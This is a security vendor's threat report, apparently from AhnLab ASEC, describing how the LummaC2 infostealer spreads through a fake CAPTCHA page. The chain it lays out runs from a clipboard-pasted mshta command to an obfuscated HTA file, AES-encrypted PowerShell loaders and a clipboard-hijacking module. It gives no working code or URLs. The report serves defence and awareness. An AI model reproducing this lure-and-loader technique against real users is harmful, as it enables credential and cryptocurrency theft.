Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page
AhnLab SEcurity intelligence Center (ASEC) previously introduced the DarkGate malware which spreads using the paste function in a blog post.
The distribution method in this case initially involved spreading malware through HTML attachments disguised as MS Word files in phishing emails. However, LummaC2 has been recently identified as spreading through a fake CAPTCHA verification page.
1. Distribution Channel
When accessing the initial distribution page, a familiar authentication screen is displayed as shown below. Clicking the “I’m not a robot” button on the page copies a command that connects to a malicious URL to the clipboard.
Figure 1. A fake CAPTCHA verification page
The threat actor explains a fake authentication step to trick users into executing the command copied to the clipboard using shortcut keys.
Figure 2. The code that copies a command to the clipboard
2. Obfuscated HTA File
The command uses the “mshta.exe” process to execute a file (web44.mp4) containing a malicious script from a malicious URL. The file contains content unrelated to the mp4 extension and is obfuscated, which makes it difficult to recognize it as a script. Although extracting the file’s strings can reveal the script, it is also obfuscated.
Figure 3. (Left: the original web44.mp4 file/Right: A script file revealed through string extraction from web44.mp4)
3. PowerShell Script Loader
The HTA file ultimately executes a PowerShell script. The executed PowerShell script is also encrypted with AES.
Figure 4. AES-decrypted script
The AES-obfuscated PowerShell script downloads and executes an additional PowerShell script (web.png).
Figure 5. The PowerShell script (web.png) executing LummaC2
4. LummaC2
The malware that is ultimately executed is LummaC2, capable of stealing information such as browser data and cryptocurrencies.
Figure 6. LummaC2 communicating with C2
“hwid” is the unique identifier for the infected PC, and a number from 1 to 3 is assigned to “pid” according to the type of information that is stolen. “lid” is presumed to be the Lumma ID and is most likely used as the distributed malware’s campaign identifier. Detailed information about LummaC2 can be found in the blog post below.
In addition, LummaC2 utilizes a module called ClipBanker, which monitors the clipboard and changes copied cryptocurrency wallet addresses to the threat actor’s wallet address.
Figure 7. ClipBanker
5. Conclusion
LummaC2 distributed through fake CAPTCHA pages is mainly spread via crack program download pages or phishing emails. Users should be especially cautious when dealing with emails or websites of unclear origin.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
